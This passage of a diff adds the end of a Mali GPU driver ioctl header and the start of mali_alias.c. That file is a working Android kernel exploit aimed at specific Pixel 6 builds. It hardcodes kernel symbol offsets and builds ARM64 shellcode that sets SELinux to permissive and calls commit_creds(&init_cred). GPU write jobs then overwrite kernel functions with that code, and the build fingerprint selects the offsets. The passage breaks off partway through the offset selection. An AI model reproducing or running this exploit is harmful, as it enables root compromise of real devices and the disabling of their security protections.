     734 + __u64 count;
     735 + __u64 address;
     736 +};
     737 + 
     738 +#define KBASE_IOCTL_STICKY_RESOURCE_UNMAP \
     739 + _IOW(KBASE_IOCTL_TYPE, 30, struct kbase_ioctl_sticky_resource_unmap)
     740 + 
     741 +/**
     742 + * union kbase_ioctl_mem_find_gpu_start_and_offset - Find the start address of
     743 + * the GPU memory region for
     744 + * the given gpu address and
     745 + * the offset of that address
     746 + * into the region
     747 + * @in: Input parameters
     748 + * @in.gpu_addr: GPU virtual address
     749 + * @in.size: Size in bytes within the region
     750 + * @out: Output parameters
     751 + * @out.start: Address of the beginning of the memory region enclosing @gpu_addr
     752 + * for the length of @offset bytes
     753 + * @out.offset: The offset from the start of the memory region to @gpu_addr
     754 + */
     755 +union kbase_ioctl_mem_find_gpu_start_and_offset {
     756 + struct {
     757 + __u64 gpu_addr;
     758 + __u64 size;
     759 + } in;
     760 + struct {
     761 + __u64 start;
     762 + __u64 offset;
     763 + } out;
     764 +};
     765 + 
     766 +#define KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET \
     767 + _IOWR(KBASE_IOCTL_TYPE, 31, union kbase_ioctl_mem_find_gpu_start_and_offset)
     768 + 
     769 +#define KBASE_IOCTL_CINSTR_GWT_START \
     770 + _IO(KBASE_IOCTL_TYPE, 33)
     771 + 
     772 +#define KBASE_IOCTL_CINSTR_GWT_STOP \
     773 + _IO(KBASE_IOCTL_TYPE, 34)
     774 + 
     775 +/**
     776 + * union kbase_ioctl_gwt_dump - Used to collect all GPU write fault addresses.
     777 + * @in: Input parameters
     778 + * @in.addr_buffer: Address of buffer to hold addresses of gpu modified areas.
     779 + * @in.size_buffer: Address of buffer to hold size of modified areas (in pages)
     780 + * @in.len: Number of addresses the buffers can hold.
     781 + * @in.padding: padding
     782 + * @out: Output parameters
     783 + * @out.no_of_addr_collected: Number of addresses collected into addr_buffer.
     784 + * @out.more_data_available: Status indicating if more addresses are available.
     785 + * @out.padding: padding
     786 + *
     787 + * This structure is used when performing a call to dump GPU write fault
     788 + * addresses.
     789 + */
     790 +union kbase_ioctl_cinstr_gwt_dump {
     791 + struct {
     792 + __u64 addr_buffer;
     793 + __u64 size_buffer;
     794 + __u32 len;
     795 + __u32 padding;
     796 + 
     797 + } in;
     798 + struct {
     799 + __u32 no_of_addr_collected;
     800 + __u8 more_data_available;
     801 + __u8 padding[27];
     802 + } out;
     803 +};
     804 + 
     805 +#define KBASE_IOCTL_CINSTR_GWT_DUMP \
     806 + _IOWR(KBASE_IOCTL_TYPE, 35, union kbase_ioctl_cinstr_gwt_dump)
     807 + 
     808 +/**
     809 + * struct kbase_ioctl_mem_exec_init - Initialise the EXEC_VA memory zone
     810 + *
     811 + * @va_pages: Number of VA pages to reserve for EXEC_VA
     812 + */
     813 +struct kbase_ioctl_mem_exec_init {
     814 + __u64 va_pages;
     815 +};
     816 + 
     817 +#define KBASE_IOCTL_MEM_EXEC_INIT \
     818 + _IOW(KBASE_IOCTL_TYPE, 38, struct kbase_ioctl_mem_exec_init)
     819 + 
     820 +/**
     821 + * union kbase_ioctl_get_cpu_gpu_timeinfo - Request zero or more types of
     822 + * cpu/gpu time (counter values)
     823 + * @in: Input parameters
     824 + * @in.request_flags: Bit-flags indicating the requested types.
     825 + * @in.paddings: Unused, size alignment matching the out.
     826 + * @out: Output parameters
     827 + * @out.sec: Integer field of the monotonic time, unit in seconds.
     828 + * @out.nsec: Fractional sec of the monotonic time, in nano-seconds.
     829 + * @out.padding: Unused, for __u64 alignment
     830 + * @out.timestamp: System wide timestamp (counter) value.
     831 + * @out.cycle_counter: GPU cycle counter value.
     832 + */
     833 +union kbase_ioctl_get_cpu_gpu_timeinfo {
     834 + struct {
     835 + __u32 request_flags;
     836 + __u32 paddings[7];
     837 + } in;
     838 + struct {
     839 + __u64 sec;
     840 + __u32 nsec;
     841 + __u32 padding;
     842 + __u64 timestamp;
     843 + __u64 cycle_counter;
     844 + } out;
     845 +};
     846 + 
     847 +#define KBASE_IOCTL_GET_CPU_GPU_TIMEINFO \
     848 + _IOWR(KBASE_IOCTL_TYPE, 50, union kbase_ioctl_get_cpu_gpu_timeinfo)
     849 + 
     850 +/**
     851 + * struct kbase_ioctl_context_priority_check - Check the max possible priority
     852 + * @priority: Input priority & output priority
     853 + */
     854 + 
     855 +struct kbase_ioctl_context_priority_check {
     856 + __u8 priority;
     857 +};
     858 + 
     859 +#define KBASE_IOCTL_CONTEXT_PRIORITY_CHECK \
     860 + _IOWR(KBASE_IOCTL_TYPE, 54, struct kbase_ioctl_context_priority_check)
     861 + 
     862 +/**
     863 + * struct kbase_ioctl_set_limited_core_count - Set the limited core count.
     864 + *
     865 + * @max_core_count: Maximum core count
     866 + */
     867 +struct kbase_ioctl_set_limited_core_count {
     868 + __u8 max_core_count;
     869 +};
     870 + 
     871 +#define KBASE_IOCTL_SET_LIMITED_CORE_COUNT \
     872 + _IOW(KBASE_IOCTL_TYPE, 55, struct kbase_ioctl_set_limited_core_count)
     873 + 
     874 + 
     875 +/***************
     876 + * Pixel ioctls *
     877 + ***************/
     878 + 
     879 +/**
     880 + * struct kbase_ioctl_apc_request - GPU asynchronous power control (APC) request
     881 + *
     882 + * @dur_usec: Duration for GPU to stay awake.
     883 + */
     884 +struct kbase_ioctl_apc_request {
     885 + __u32 dur_usec;
     886 +};
     887 + 
     888 +#define KBASE_IOCTL_APC_REQUEST \
     889 + _IOW(KBASE_IOCTL_TYPE, 66, struct kbase_ioctl_apc_request)
     890 + 
     891 +/***************
     892 + * test ioctls *
     893 + ***************/
     894 +#if MALI_UNIT_TEST
     895 +/* These ioctls are purely for test purposes and are not used in the production
     896 + * driver, they therefore may change without notice
     897 + */
     898 + 
     899 +#define KBASE_IOCTL_TEST_TYPE (KBASE_IOCTL_TYPE + 1)
     900 + 
     901 + 
     902 +/**
     903 + * struct kbase_ioctl_tlstream_stats - Read tlstream stats for test purposes
     904 + * @bytes_collected: number of bytes read by user
     905 + * @bytes_generated: number of bytes generated by tracepoints
     906 + */
     907 +struct kbase_ioctl_tlstream_stats {
     908 + __u32 bytes_collected;
     909 + __u32 bytes_generated;
     910 +};
     911 + 
     912 +#define KBASE_IOCTL_TLSTREAM_STATS \
     913 + _IOR(KBASE_IOCTL_TEST_TYPE, 2, struct kbase_ioctl_tlstream_stats)
     914 + 
     915 +#endif /* MALI_UNIT_TEST */
     916 + 
     917 +/* Customer extension range */
     918 +#define KBASE_IOCTL_EXTRA_TYPE (KBASE_IOCTL_TYPE + 2)
     919 + 
     920 +/* If the integration needs extra ioctl add them there
     921 + * like this:
     922 + *
     923 + * struct my_ioctl_args {
     924 + * ....
     925 + * }
     926 + *
     927 + * #define KBASE_IOCTL_MY_IOCTL \
     928 + * _IOWR(KBASE_IOCTL_EXTRA_TYPE, 0, struct my_ioctl_args)
     929 + */
     930 + 
     931 + 
     932 +/**********************************
     933 + * Definitions for GPU properties *
     934 + **********************************/
     935 +#define KBASE_GPUPROP_VALUE_SIZE_U8 (0x0)
     936 +#define KBASE_GPUPROP_VALUE_SIZE_U16 (0x1)
     937 +#define KBASE_GPUPROP_VALUE_SIZE_U32 (0x2)
     938 +#define KBASE_GPUPROP_VALUE_SIZE_U64 (0x3)
     939 + 
     940 +#define KBASE_GPUPROP_PRODUCT_ID 1
     941 +#define KBASE_GPUPROP_VERSION_STATUS 2
     942 +#define KBASE_GPUPROP_MINOR_REVISION 3
     943 +#define KBASE_GPUPROP_MAJOR_REVISION 4
     944 +/* 5 previously used for GPU speed */
     945 +#define KBASE_GPUPROP_GPU_FREQ_KHZ_MAX 6
     946 +/* 7 previously used for minimum GPU speed */
     947 +#define KBASE_GPUPROP_LOG2_PROGRAM_COUNTER_SIZE 8
     948 +#define KBASE_GPUPROP_TEXTURE_FEATURES_0 9
     949 +#define KBASE_GPUPROP_TEXTURE_FEATURES_1 10
     950 +#define KBASE_GPUPROP_TEXTURE_FEATURES_2 11
     951 +#define KBASE_GPUPROP_GPU_AVAILABLE_MEMORY_SIZE 12
     952 + 
     953 +#define KBASE_GPUPROP_L2_LOG2_LINE_SIZE 13
     954 +#define KBASE_GPUPROP_L2_LOG2_CACHE_SIZE 14
     955 +#define KBASE_GPUPROP_L2_NUM_L2_SLICES 15
     956 + 
     957 +#define KBASE_GPUPROP_TILER_BIN_SIZE_BYTES 16
     958 +#define KBASE_GPUPROP_TILER_MAX_ACTIVE_LEVELS 17
     959 + 
     960 +#define KBASE_GPUPROP_MAX_THREADS 18
     961 +#define KBASE_GPUPROP_MAX_WORKGROUP_SIZE 19
     962 +#define KBASE_GPUPROP_MAX_BARRIER_SIZE 20
     963 +#define KBASE_GPUPROP_MAX_REGISTERS 21
     964 +#define KBASE_GPUPROP_MAX_TASK_QUEUE 22
     965 +#define KBASE_GPUPROP_MAX_THREAD_GROUP_SPLIT 23
     966 +#define KBASE_GPUPROP_IMPL_TECH 24
     967 + 
     968 +#define KBASE_GPUPROP_RAW_SHADER_PRESENT 25
     969 +#define KBASE_GPUPROP_RAW_TILER_PRESENT 26
     970 +#define KBASE_GPUPROP_RAW_L2_PRESENT 27
     971 +#define KBASE_GPUPROP_RAW_STACK_PRESENT 28
     972 +#define KBASE_GPUPROP_RAW_L2_FEATURES 29
     973 +#define KBASE_GPUPROP_RAW_CORE_FEATURES 30
     974 +#define KBASE_GPUPROP_RAW_MEM_FEATURES 31
     975 +#define KBASE_GPUPROP_RAW_MMU_FEATURES 32
     976 +#define KBASE_GPUPROP_RAW_AS_PRESENT 33
     977 +#define KBASE_GPUPROP_RAW_JS_PRESENT 34
     978 +#define KBASE_GPUPROP_RAW_JS_FEATURES_0 35
     979 +#define KBASE_GPUPROP_RAW_JS_FEATURES_1 36
     980 +#define KBASE_GPUPROP_RAW_JS_FEATURES_2 37
     981 +#define KBASE_GPUPROP_RAW_JS_FEATURES_3 38
     982 +#define KBASE_GPUPROP_RAW_JS_FEATURES_4 39
     983 +#define KBASE_GPUPROP_RAW_JS_FEATURES_5 40
     984 +#define KBASE_GPUPROP_RAW_JS_FEATURES_6 41
     985 +#define KBASE_GPUPROP_RAW_JS_FEATURES_7 42
     986 +#define KBASE_GPUPROP_RAW_JS_FEATURES_8 43
     987 +#define KBASE_GPUPROP_RAW_JS_FEATURES_9 44
     988 +#define KBASE_GPUPROP_RAW_JS_FEATURES_10 45
     989 +#define KBASE_GPUPROP_RAW_JS_FEATURES_11 46
     990 +#define KBASE_GPUPROP_RAW_JS_FEATURES_12 47
     991 +#define KBASE_GPUPROP_RAW_JS_FEATURES_13 48
     992 +#define KBASE_GPUPROP_RAW_JS_FEATURES_14 49
     993 +#define KBASE_GPUPROP_RAW_JS_FEATURES_15 50
     994 +#define KBASE_GPUPROP_RAW_TILER_FEATURES 51
     995 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_0 52
     996 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_1 53
     997 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_2 54
     998 +#define KBASE_GPUPROP_RAW_GPU_ID 55
     999 +#define KBASE_GPUPROP_RAW_THREAD_MAX_THREADS 56
     1000 +#define KBASE_GPUPROP_RAW_THREAD_MAX_WORKGROUP_SIZE 57
     1001 +#define KBASE_GPUPROP_RAW_THREAD_MAX_BARRIER_SIZE 58
     1002 +#define KBASE_GPUPROP_RAW_THREAD_FEATURES 59
     1003 +#define KBASE_GPUPROP_RAW_COHERENCY_MODE 60
     1004 + 
     1005 +#define KBASE_GPUPROP_COHERENCY_NUM_GROUPS 61
     1006 +#define KBASE_GPUPROP_COHERENCY_NUM_CORE_GROUPS 62
     1007 +#define KBASE_GPUPROP_COHERENCY_COHERENCY 63
     1008 +#define KBASE_GPUPROP_COHERENCY_GROUP_0 64
     1009 +#define KBASE_GPUPROP_COHERENCY_GROUP_1 65
     1010 +#define KBASE_GPUPROP_COHERENCY_GROUP_2 66
     1011 +#define KBASE_GPUPROP_COHERENCY_GROUP_3 67
     1012 +#define KBASE_GPUPROP_COHERENCY_GROUP_4 68
     1013 +#define KBASE_GPUPROP_COHERENCY_GROUP_5 69
     1014 +#define KBASE_GPUPROP_COHERENCY_GROUP_6 70
     1015 +#define KBASE_GPUPROP_COHERENCY_GROUP_7 71
     1016 +#define KBASE_GPUPROP_COHERENCY_GROUP_8 72
     1017 +#define KBASE_GPUPROP_COHERENCY_GROUP_9 73
     1018 +#define KBASE_GPUPROP_COHERENCY_GROUP_10 74
     1019 +#define KBASE_GPUPROP_COHERENCY_GROUP_11 75
     1020 +#define KBASE_GPUPROP_COHERENCY_GROUP_12 76
     1021 +#define KBASE_GPUPROP_COHERENCY_GROUP_13 77
     1022 +#define KBASE_GPUPROP_COHERENCY_GROUP_14 78
     1023 +#define KBASE_GPUPROP_COHERENCY_GROUP_15 79
     1024 + 
     1025 +#define KBASE_GPUPROP_TEXTURE_FEATURES_3 80
     1026 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_3 81
     1027 + 
     1028 +#define KBASE_GPUPROP_NUM_EXEC_ENGINES 82
     1029 + 
     1030 +#define KBASE_GPUPROP_RAW_THREAD_TLS_ALLOC 83
     1031 +#define KBASE_GPUPROP_TLS_ALLOC 84
     1032 +#define KBASE_GPUPROP_RAW_GPU_FEATURES 85
     1033 + 
     1034 +#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12)
     1035 + 
     1036 +#endif /* _UAPI_KBASE_JM_IOCTL_H_ */
     1037 + 
     1038 + 
    mali_alias.c
     1 +#include <err.h>
     2 +#include <errno.h>
     3 +#include <fcntl.h>
     4 +#include <stdio.h>
     5 +#include <stdlib.h>
     6 +#include <string.h>
     7 +#include <sys/mman.h>
     8 +#include <sys/stat.h>
     9 +#include <sys/types.h>
     10 +#include <unistd.h>
     11 +#include <sys/wait.h>
     12 +#include <sys/system_properties.h>
     13 + 
      14 +#include <stdbool.h>
     15 + 
     16 +#include "mali.h"
     17 +#include "mali_base_jm_kernel.h"
     18 +#include "midgard.h"
     19 + 
     20 +#define MALI "/dev/mali0"
     21 + 
     22 +#define PAGE_SHIFT 12
     23 + 
     24 +#define BASE_MEM_ALIAS_MAX_ENTS ((size_t)24576)
     25 + 
     26 +#define PFN_DOWN(x) ((x) >> PAGE_SHIFT)
     27 + 
     28 +#define POOL_SIZE 16384
     29 + 
     30 +#define RESERVED_SIZE 32
     31 + 
     32 +#define TOTAL_RESERVED_SIZE 1024
     33 + 
     34 +#define KERNEL_BASE 0x80000000
     35 + 
     36 +#define OVERWRITE_INDEX 256
     37 + 
     38 +#define ADRP_INIT_INDEX 0
     39 + 
     40 +#define ADD_INIT_INDEX 1
     41 + 
     42 +#define ADRP_COMMIT_INDEX 2
     43 + 
     44 +#define ADD_COMMIT_INDEX 3
     45 + 
     46 +#define AVC_DENY_2108 0x92df1c
     47 + 
     48 +#define SEL_READ_ENFORCE_2108 0x942ae4
     49 + 
     50 +#define INIT_CRED_2108 0x29a0570
     51 + 
     52 +#define COMMIT_CREDS_2108 0x180b0c
     53 + 
     54 +#define ADD_INIT_2108 0x9115c000
     55 + 
     56 +#define ADD_COMMIT_2108 0x912c3108
     57 + 
     58 +#define AVC_DENY_2201 0x930af4
     59 + 
     60 +#define SEL_READ_ENFORCE_2201 0x9456bc
     61 + 
     62 +#define INIT_CRED_2201 0x29b0570
     63 + 
     64 +#define COMMIT_CREDS_2201 0x183df0
     65 + 
     66 +#define ADD_INIT_2201 0x9115c000
     67 + 
     68 +#define ADD_COMMIT_2201 0x9137c108
     69 + 
     70 +#define AVC_DENY_2202 0x930b50
     71 + 
     72 +#define SEL_READ_ENFORCE_2202 0x94551c
     73 + 
     74 +#define INIT_CRED_2202 0x29b0570
     75 + 
     76 +#define COMMIT_CREDS_2202 0x183e3c
     77 + 
     78 +#define ADD_INIT_2202 0x9115c000 //add x0, x0, #0x570
     79 + 
     80 +#define ADD_COMMIT_2202 0x9138f108 //add x8, x8, #0xe3c
     81 + 
     82 +static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2108;
     83 + 
     84 +static uint64_t avc_deny = AVC_DENY_2108;
     85 + 
     86 +static int atom_number = 1;
     87 + 
     88 +/*
     89 +Overwriting SELinux to permissive
     90 + strb wzr, [x0]
     91 + mov x0, #0
     92 + ret
     93 +*/
     94 +static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0};
     95 + 
     96 +static uint32_t root_code[8] = {0};
     97 + 
     98 +struct base_mem_handle {
     99 + struct {
     100 + __u64 handle;
     101 + } basep;
     102 +};
     103 + 
     104 +struct base_mem_aliasing_info {
     105 + struct base_mem_handle handle;
     106 + __u64 offset;
     107 + __u64 length;
     108 +};
     109 + 
     110 +static int open_dev(char* name) {
     111 + int fd = open(name, O_RDWR);
     112 + if (fd == -1) {
     113 + err(1, "cannot open %s\n", name);
     114 + }
     115 + return fd;
     116 +}
     117 + 
     118 +void setup_mali(int fd) {
     119 + struct kbase_ioctl_version_check param = {0};
     120 + if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, &param) < 0) {
     121 + err(1, "version check failed\n");
     122 + }
     123 + struct kbase_ioctl_set_flags set_flags = {1 << 3};
     124 + if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) {
     125 + err(1, "set flags failed\n");
     126 + }
     127 +}
     128 + 
     129 +void* setup_tracking_page(int fd) {
     130 + void* region = mmap(NULL, 0x1000, 0, MAP_SHARED, fd, BASE_MEM_MAP_TRACKING_HANDLE);
     131 + if (region == MAP_FAILED) {
     132 + err(1, "setup tracking page failed");
     133 + }
     134 + return region;
     135 +}
     136 + 
     137 +void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) {
     138 + if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) {
     139 + err(1, "mem_alloc failed\n");
     140 + }
     141 +}
     142 + 
     143 +void mem_alias(int fd, union kbase_ioctl_mem_alias* alias) {
     144 + if (ioctl(fd, KBASE_IOCTL_MEM_ALIAS, alias) < 0) {
     145 + err(1, "mem_alias failed\n");
     146 + }
     147 +}
     148 + 
     149 +void mem_query(int fd, union kbase_ioctl_mem_query* query) {
     150 + if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) {
     151 + err(1, "mem_query failed\n");
     152 + }
     153 +}
     154 + 
     155 +uint32_t lo32(uint64_t x) {
     156 + return x & 0xffffffff;
     157 +}
     158 + 
     159 +uint32_t hi32(uint64_t x) {
     160 + return x >> 32;
     161 +}
     162 + 
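/* Encode an AArch64 ADRP instruction that loads the 4KB page address of `label`
 * into register x<rd>, assuming the instruction will execute at address `pc`. */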
     163 +uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
     164 + uint64_t pc_page = pc >> 12;
     165 + uint64_t label_page = label >> 12;
     166 + int64_t offset = (label_page - pc_page) << 12;
     167 + int64_t immhi_mask = 0xffffe0;
     168 + int64_t immhi = offset >> 14;
     169 + int32_t immlo = (offset >> 12) & 0x3;
      170 + uint32_t adrp = rd & 0x1f;
      171 + adrp |= (1 << 28);
      172 + adrp |= (1 << 31); //op
      173 + adrp |= immlo << 29;
      174 + adrp |= (immhi_mask & (immhi << 5));
      175 + return adrp;
     176 +}
     177 + 
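/* Build the root_code[] payload: point x0 at init_cred and x8 at commit_creds,
 * then blr x8 and return, i.e. commit_creds(&init_cred). The ADRP encodings use
 * read_enforce as the PC, since the payload is intended to be written at that address. */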
     178 +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) {
     179 + 
     180 + uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
     181 + //Sets x0 to init_cred
     182 + root_code[ADRP_INIT_INDEX] = init_adpr;
     183 + root_code[ADD_INIT_INDEX] = add_init;
     184 + //Sets x8 to commit_creds
     185 + root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred);
     186 + root_code[ADD_COMMIT_INDEX] = add_commit;
     187 + root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
     188 + root_code[5] = 0xd63f0100; // blr x8
     189 + root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
     190 + root_code[7] = 0xd65f03c0; // ret
     191 +}
     192 + 
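/* Look up a single GPU property by walking the key/value buffer returned by
 * KBASE_IOCTL_GET_GPUPROPS; the low 2 bits of each key encode the size of the
 * value that follows (see the format notes in mali.h). */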
     193 +uint64_t get_gpuprop(int fd, uint32_t key) {
     194 + struct kbase_ioctl_get_gpuprops props = {0};
     195 + uint8_t buffer[0x1000] = {0};
     196 + props.buffer = (uint64_t)(&(buffer[0]));
     197 + props.size = 0x1000;
     198 + if (ioctl(fd, KBASE_IOCTL_GET_GPUPROPS, &props) < 0) {
     199 + err(1, "get_gpuprop failed\n");
     200 + }
     201 + int idx = 0;
     202 + while (idx < 0x1000) {
     203 + uint32_t this_key = *(uint32_t*)(&(buffer[idx]));
     204 + uint32_t size_code = this_key & 0x3;
     205 + this_key = this_key >> 2;
     206 + uint64_t value;
     207 + idx += 4;
     208 + switch (size_code) {
     209 + case 0:
     210 + value = buffer[idx];
     211 + idx++;
     212 + break;
     213 + case 1:
     214 + value = *(uint16_t*)(&(buffer[idx]));
     215 + idx += 2;
     216 + break;
     217 + case 2:
     218 + value = *(uint32_t*)(&(buffer[idx]));
     219 + idx += 4;
     220 + break;
     221 + case 3:
     222 + value = *(uint64_t*)(&(buffer[idx]));
     223 + idx += 8;
     224 + break;
     225 + }
     226 + if (key == this_key) return value;
     227 + }
     228 + err(1, "cannot find prop\n");
     229 + return -1;
     230 +}
     231 + 
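/* Allocate `pages` pages of GPU memory from memory group `group` and mmap them
 * into the CPU address space; read_only controls whether the GPU may write to the region. */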
     232 +void* map_gpu(int mali_fd, unsigned int pages, bool read_only, int group) {
     233 + union kbase_ioctl_mem_alloc alloc = {0};
     234 + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22);
     235 + int prot = PROT_READ | PROT_WRITE;
     236 + if (!read_only) {
     237 + alloc.in.flags |= BASE_MEM_PROT_GPU_WR;
     238 + prot |= PROT_WRITE;
     239 + }
     240 + alloc.in.va_pages = pages;
     241 + alloc.in.commit_pages = pages;
     242 + mem_alloc(mali_fd, &alloc);
     243 + void* region = mmap(NULL, 0x1000 * pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va);
     244 + if (region == MAP_FAILED) {
     245 + err(1, "mmap failed");
     246 + }
     247 + return region;
     248 +}
     249 + 
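/* Have the GPU write `value` at GPU virtual address `gpu_addr` by submitting a
 * WRITE_VALUE job; `type` selects the width of the write. */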
     250 +void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) {
     251 + void* jc_region = map_gpu(mali_fd, 1, false, 0);
     252 + struct MALI_JOB_HEADER jh = {0};
     253 + jh.is_64b = true;
     254 + jh.type = MALI_JOB_TYPE_WRITE_VALUE;
     255 +
     256 + struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0};
     257 + payload.type = type;
     258 + payload.immediate_value = value;
     259 + payload.address = gpu_addr;
     260 + 
     261 + MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh);
     262 + MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload);
     263 + uint32_t* section = (uint32_t*)jc_region;
     264 + struct base_jd_atom_v2 atom = {0};
     265 + atom.jc = (uint64_t)jc_region;
     266 + atom.atom_number = atom_number;
     267 + atom.core_req = BASE_JD_REQ_CS;
     268 + struct kbase_ioctl_job_submit submit = {0};
     269 + submit.addr = (uint64_t)(&atom);
     270 + submit.nr_atoms = 1;
     271 + submit.stride = sizeof(struct base_jd_atom_v2);
     272 + if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
     273 + err(1, "submit job failed\n");
     274 + }
     275 + usleep(10000);
     276 +}
     277 + 
     278 +void* drain_mem_pool(int mali_fd) {
     279 + return map_gpu(mali_fd, POOL_SIZE, false, 1);
     280 +}
     281 + 
     282 +void release_mem_pool(void* drain) {
     283 + munmap(drain, POOL_SIZE * 0x1000);
     284 +}
     285 + 
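/* Allocate `nents` GPU regions of `pages` pages each and record their GPU VAs in
 * reserved_va; they are mapped into the CPU address space later by map_reserved(). */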
     286 +void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
     287 + for (int i = 0; i < nents; i++) {
     288 + union kbase_ioctl_mem_alloc alloc = {0};
     289 + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22);
     290 + int prot = PROT_READ | PROT_WRITE;
     291 + alloc.in.va_pages = pages;
     292 + alloc.in.commit_pages = pages;
     293 + mem_alloc(mali_fd, &alloc);
     294 + reserved_va[i] = alloc.out.gpu_va;
     295 + }
     296 +}
     297 + 
     298 +void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
     299 + for (int i = 0; i < nents; i++) {
     300 + void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]);
     301 + if (reserved == MAP_FAILED) {
     302 + err(1, "mmap reserved failed");
     303 + }
     304 + reserved_va[i] = (uint64_t)reserved;
     305 + }
     306 +}
     307 + 
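/* Return the address within the same 2MB-aligned block as `addr` whose level-3
 * page-table index is 0x100 (OVERWRITE_INDEX). */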
     308 +uint64_t set_addr_lv3(uint64_t addr) {
     309 + uint64_t pfn = addr >> PAGE_SHIFT;
     310 + pfn &= ~ 0x1FFUL;
     311 + pfn |= 0x100UL;
     312 + return pfn << PAGE_SHIFT;
     313 +}
     314 + 
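/* Index of `addr` in the page table at the given level: the MMU resolves 9 bits
 * of the virtual page frame number per level, level 3 being the last. */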
     315 +static inline uint64_t compute_pt_index(uint64_t addr, int level) {
     316 + uint64_t vpfn = addr >> PAGE_SHIFT;
     317 + vpfn >>= (3 - level) * 9;
     318 + return vpfn & 0x1FF;
     319 +}
     320 + 
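/* For every distinct page at level-3 index OVERWRITE_INDEX covered by the reserved
 * regions, have the GPU write a zero byte at the page offset of the kernel symbol `func`. */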
     321 +void write_state(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) {
     322 + uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
     323 + uint64_t curr_overwrite_addr = 0;
     324 + for (int i = 0; i < size; i++) {
     325 + uint64_t base = reserved[i];
     326 + uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000;
     327 + uint64_t start_idx = compute_pt_index(base, 3);
     328 + uint64_t end_idx = compute_pt_index(end, 3);
     329 + for (uint64_t addr = base; addr < end; addr += 0x1000) {
     330 + uint64_t overwrite_addr = set_addr_lv3(addr);
     331 + if (curr_overwrite_addr != overwrite_addr) {
     332 + printf("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset);
     333 + curr_overwrite_addr = overwrite_addr;
     334 + write_to(mali_fd, overwrite_addr + func_offset, 0, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_8);
     335 + usleep(300000);
     336 + }
     337 + }
     338 + }
     339 +}
     340 + 
     341 + 
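/* Same walk as write_state(), but write the `shellcode` words (code_size of them,
 * last word first) over the kernel function at `func`. */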
     342 +void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) {
     343 + uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
     344 + uint64_t curr_overwrite_addr = 0;
     345 + for (int i = 0; i < size; i++) {
     346 + uint64_t base = reserved[i];
     347 + uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000;
     348 + uint64_t start_idx = compute_pt_index(base, 3);
     349 + uint64_t end_idx = compute_pt_index(end, 3);
     350 + for (uint64_t addr = base; addr < end; addr += 0x1000) {
     351 + uint64_t overwrite_addr = set_addr_lv3(addr);
     352 + if (curr_overwrite_addr != overwrite_addr) {
     353 + printf("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset);
     354 + curr_overwrite_addr = overwrite_addr;
     355 + for (int code = code_size - 1; code >= 0; code--) {
     356 + write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
     357 + }
     358 + usleep(300000);
     359 + }
     360 + }
     361 + }
     362 +}
     363 + 
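/* Read a byte from /sys/fs/selinux/enforce (after a short delay) and print it,
 * as a check of the SELinux state after patching. */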
     364 +int run_enforce() {
     365 + char result = '2';
     366 + sleep(3);
     367 + int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY);
     368 + read(enforce_fd, &result, 1);
     369 + close(enforce_fd);
     370 + printf("result %d\n", result);
     371 + return result;
     372 +}
     373 + 
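//Pick the kernel offsets (avc_deny, sel_read_enforce, and the init_cred /
//commit_creds values used by fixup_root_shell) matching the device's build
//fingerprint; only the Pixel 6 builds listed below are supported.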
     374 +void select_offset() {
     375 + char fingerprint[256];
     376 + int len = __system_property_get("ro.build.fingerprint", fingerprint);
     377 + printf("fingerprint: %s\n", fingerprint);
     378 + if (!strcmp(fingerprint, "google/oriole/oriole:12/SD1A.210817.037/7862242:user/release-keys")) {
     379 + avc_deny = AVC_DENY_2108;
     380 + sel_read_enforce = SEL_READ_ENFORCE_2108;
     381 + fixup_root_shell(INIT_CRED_2108, COMMIT_CREDS_2108, SEL_READ_ENFORCE_2108, ADD_INIT_2108, ADD_COMMIT_2108);
     382 + return;
     383 + }
